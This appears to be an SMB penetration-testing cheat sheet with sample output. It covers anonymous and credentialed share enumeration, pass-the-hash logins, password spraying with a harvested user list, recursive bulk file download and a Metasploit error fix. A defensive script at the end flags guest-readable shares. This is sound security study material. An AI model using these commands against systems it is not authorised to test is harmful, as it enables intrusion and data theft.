SMB - (445-139)
Recommended commands for listing shares as an anonymous user, with valid credentials, and with the pass-the-hash technique.
$ smbmap -H 10.10.10.111
[+] Guest session IP: 10.11.1.231:445 Name: 10.11.1.231
Disk Permissions Comment
---- ----------- -------
home READ ONLY Home
docs READ ONLY docs
tmp READ ONLY TMP
IPC$ NO ACCESS IPC Service (Samba 4.2.10-Debian)
$ smbclient \\\\10.10.10.111\\home
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Dec 27 23:20:35 2015
.. D 0 Sun Dec 27 23:09:11 2015
folder08 D 0 Fri Jan 2 06:13:55 2015
folder02 D 0 Fri Jan 2 07:44:26 2015
$ smbclient --no-pass -L //10.10.10.111
$ smbmap -u invalid -H 10.10.10.111
[+] Guest session IP: 10.10.10.111:445 Name: BLACKFIELD.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
smbclient -U invalid //10.10.10.111/profiles\$
smbmap -H 192.168.0.1 [-P <PORT>] #Null user
smbmap -u "username" -p "password" -H 192.168.0.1 [-P <PORT>] #Creds
smbmap -u "username" -p "<LM>:<NT>" -H 192.168.0.1 [-P <PORT>] #Pass-the-Hash
crackmapexec smb 192.168.0.1 -u '' -p '' --shares #Null user
crackmapexec smb 192.168.0.1 -u 'username' -p 'password' --shares #Creds
crackmapexec smb 192.168.0.1 -u 'username' -H '<HASH>' --shares #Pass-the-Hash
nmap -p445 --script "smb-vuln-*" 10.10.10.111
# Check the SMB version
crackmapexec smb 10.10.10.111
# Build a wordlist from SMB folder names
smbclient -U invalid%invalid //10.10.10.111/profiles\$ -c ls | awk '{print $1}' > users.txt
# Filter by file extension with a recursive search
smbmap -u SABatchJobs -p SABatchJobs -d megabank -H 10.10.10.172 -A '(xlsx|docx|txt|xml)' -R
# Get the SMB version
/smbver.sh 10.10.10.111 139
10.10.10.111: UnixSamba 227a
# Download every file in a share recursively, without per-file prompts
smb: \> prompt off
smb: \> recurse on
smb: \> mget *
crackmapexec smb 10.10.10.111 -u users.txt -p users.txt --continue-on-success
[-] 172.20.8.130:445 - Exploit failed: RubySMB::Error::EncryptionError Communication error with the remote host: Socket read returned nil. The server supports encryption but was not able to handle the encrypted request.
[*] Exploit completed, but no session was created.
## Solution
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1
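To turn the smbmap share listings earlier on this page into an audit check, the following added example (not part of the original page) reports every share that a guest session can read or write. The sample output is constructed, and the `[+] IP:` header used for the authenticated run is an assumption about smbmap's output format.

```shell
#!/bin/sh
# Constructed sample, shaped like the smbmap listings on this page.
sample_smbmap_output() {
cat <<'EOF'
[+] Guest session IP: 10.10.10.111:445 Name: BLACKFIELD.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
archive NO ACCESS READ ONLY copy of old backups
IPC$ READ ONLY Remote IPC
profiles$ READ ONLY
[+] IP: 10.10.10.172:445 Name: MEGABANK.local
Disk Permissions Comment
---- ----------- -------
users$ READ ONLY
EOF
}

# Print "host<TAB>share<TAB>permission" for each share usable by a guest session.
guest_exposed_shares() {
  awk '
    /^\[[+*!-]\]/ {
      # A status line opens a new host block; remember whether it was a guest login.
      guest = ($0 ~ /Guest session/)
      host = ""
      for (i = 1; i < NF; i++) if ($i == "IP:") host = $(i + 1)
      sub(/:[0-9]+$/, "", host)          # drop the :445 port suffix
      next
    }
    # The leftmost permission keyword is the real column; later hits are comment text.
    guest && match($0, /NO ACCESS|READ, WRITE|READ ONLY|WRITE ONLY/) {
      perm = substr($0, RSTART, RLENGTH)
      if (perm == "NO ACCESS") next
      share = substr($0, 1, RSTART - 1)
      gsub(/^[ \t]+|[ \t]+$/, "", share)
      printf "%s\t%s\t%s\n", host, share, perm
    }
  '
}

sample_smbmap_output | guest_exposed_shares
```

Shares such as `profiles$` that show up here are the ones to review for guest access; `IPC$` being readable is commonly expected.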